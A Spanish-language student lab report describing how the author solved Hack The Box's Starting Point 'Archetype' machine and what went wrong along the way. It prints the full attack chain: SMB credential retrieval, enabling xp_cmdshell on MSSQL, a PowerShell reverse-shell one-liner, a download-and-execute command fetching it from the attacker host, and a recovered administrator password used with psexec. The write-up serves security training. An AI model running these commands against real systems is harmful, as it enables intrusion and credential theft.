UNIVERSIDAD TECNOLOGICA DE PANAMA
FACULTAD DE SISTEMAS COMPUTACIONALES
LICENCIATURA EN INGNIERIA DE SISTEMAS DE INFORMACION
NOMBRE
AMILCAR FUENTES
8-906-2320
MATERIA
TOPICOS ESPECIALES 2
LABORATORIO
CONFIGURACION HACKTHEBOX.EU
PROFESOR
ERICK AGRAZAL
2020
Ingresar al sitio https://www.hackthebox.eu/home/start (Starting point tutorial)
luego realizarla autenticación del trabajo en clase #2, donde se ingresó a la
plataforma Hack The Box. Se debe realizar un informe escrito de cómo realizó la
configuración y cuáles fueron sus dificultades.
Una vez registrado, continuar al Starting Point
Debemos descargar e instalar un sistema operativo Virtual, en mi caso estaré utilizando
Virtual Box, con Kali Linux
Realizar la configuración de la maquina virtual e Instalar el SO
Descargar el pack de
Conexión de Vpn,
este se guardará en
la carpeta Descargas
Una vez descargado, abrir otra terminal, entrar a descargas, cd Descargas, y utilizar el
siguiente comando sudo openvpn AlexangelSQD.ovpn (x.ovpn es el archivo descargado
con su respectivo nombre)
Una vez ejecutado el comando debe salir Initialization Sequence Completed
Abrir otra terminal y ejecutar el siguiente comando:
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ','
| sed s/,$//)
Luego nmap -sC -sV -p$ports 10.10.10.27 para mostrar los puertos abiertos
Una vez identificado los puertos abiertos, ejecutar el comando smbclient -N -L
\\\\10.10.10.27\\ aparecerán los datos, ejecutar smbclient -N \\\\10.10.10.27\\backups
para acceder a la carpeta backups
Luego colocar dir y se mostrara los archivos dentro de backups, utilizar el comando get
prod.dtsConfig para descargar este archivo en nuestro equipo
Dentro del archivo prod.dtsConfig se encuentra el usuario y contraseña de un usuario de
Windows
Ir a la ruta https://github.com/SecureAuthCorp/impacket descargar e instalar el
paquete antes del siguiente paso
Abrir una nueva terminal, ejecutar el siguiente comando
Mssqlclient.py ARCHETYPE/
[email protected] -windows-auth
Ejecutar SELECT IS_SRVROLEMEMBER ('sysadmin')
Ejecutar el siguiente comando en la terminal de SQL
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"
Abrir un TEXT EDITOR y copiar el siguiente comando:
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0,
$bytes.Length)) -ne 0){;$data = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-
String );$sendback2 = $sendback + "# ";$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Sustituir la dirección IP del comando con nuestra dirección IP, Guardar con el nombre
Shell.ps1
Abrir una nueva terminal y ejecutar el siguiente comando: python3 -m http.server 80
para levantar un servidor
Abrir una nueva terminal y ejecutar el siguiente comando: nc -lvnp 443
Abrir una nueva terminal y ejecutar el siguiente comando: ufw allow from 10.10.10.27
proto tcp to any port 80,443
Ejecutar los siguientes comandos en la terminal de SQL
xp_cmdshell "powershell "IEX (New-Object
Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"
type_C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /users:administrador MEGACORP_4dm1n!!
Abrir una nueva terminal y ejecutar el siguiente comando:
psexec.py
[email protected]Este solicitara la contraseña: MEGACORP_4dm1n!!
Ejecutar whoami
Buscar la ruta del escritorio del Administrador por comandos de Windows, hasta
encontrar el archivo root.txt
Ejecutar TYPE root.txt para mostrar el contenido del archivo
Copiar el contenido del archivo root.txt en el cuadro y presionar Submit
Una vez finalizado la Introducción debe salir esta pantalla.
Dificultades
La instalación de Kali Linux, el usuario que cree no contaba con permisos de
superusuario, así que tuve que realizar el laboratorio corriendo el sistema en
LIVE MODE.
Al momento de utilizar el comando mssqlclient no ejecutaba porque no tenía
instalado el paquete Impacket y no podía instalarlo desde github, tuve que
actualizar python y demás paquetes.
Al momento de ejecutar el comando dentro de shell.ps1 no funcionaba con el IP
así que llegue a la conclusión de sustituir la dirección IP en el archivo y en el
comando.
Al utilizar la función UFW nuevamente me mandaba error, no lo tenía instalado
de modo que tuve que realizar la instalación de este paquete.
Al utilizar la función psexec.py no ejecutaba porque necesitaba instalar este
paquete para continuar con el laboratorio.
Conclusión
Este laboratorio a pesar de que nos mostraba los comandos a utilizar tuve varios
problemas a la hora de ejecutarlos porque habían paquetes y complementos que no
estaban instalados y la manera habitual de instalarlos con el comando apt o apt-get
install no funcionaban, así que tuve que buscar otros métodos de instalación y
actualización de librerías. En cuanto al proceso fue claro y legible lo que se intentaba
hacer, acceder a un servidor Windows con el usuario administrador y conseguir el
archivo dentro del escritorio. Fue interesante ver como dentro de la consola de Linux se
pudo correr los comandos propios de Windows dentro del servidor. Un laboratorio que
nos va a ser de mucha utilidad en el futuro para los retos de Hack in the box.
Bibliografía
https://www.hackthebox.eu/home/start
https://www.kali.org/downloads/
https://github.com/SecureAuthCorp/impacket.git
https://docs.microsoft.com/en-us/sql/linux/sql-server-linux-setup-tools?view=sql-
server-ver15
https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py